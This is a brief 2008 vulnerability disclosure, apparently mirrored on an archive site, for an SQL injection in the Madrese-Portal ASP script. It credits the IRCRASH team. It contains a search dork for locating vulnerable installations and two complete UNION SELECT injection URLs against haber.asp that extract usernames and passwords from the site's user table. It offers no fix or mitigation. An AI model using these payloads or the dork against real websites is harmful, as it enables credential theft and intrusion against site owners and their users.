Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21093
HistoryDec 29, 2008 - 12:00 a.m.

Madrese-Portal Sql Injection

2008-12-2900:00:00
vulners.com
7

#####################################################################################

Madrese-Portal Sql Injection

#####################################################################################

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################

#Download : http://dl.p30vel.ir/scripts/Madrese-Portal-Asp-Eh3an.p-(www.p30vel.ir).rar

#Dork : "Design By ASD Tasarim" #

#####################################################################################

[Bug]

#Username : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1

#Password : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1

#####################################################################################

Site : Http://IRCRASH.COM

###################################### TNX GOD ######################################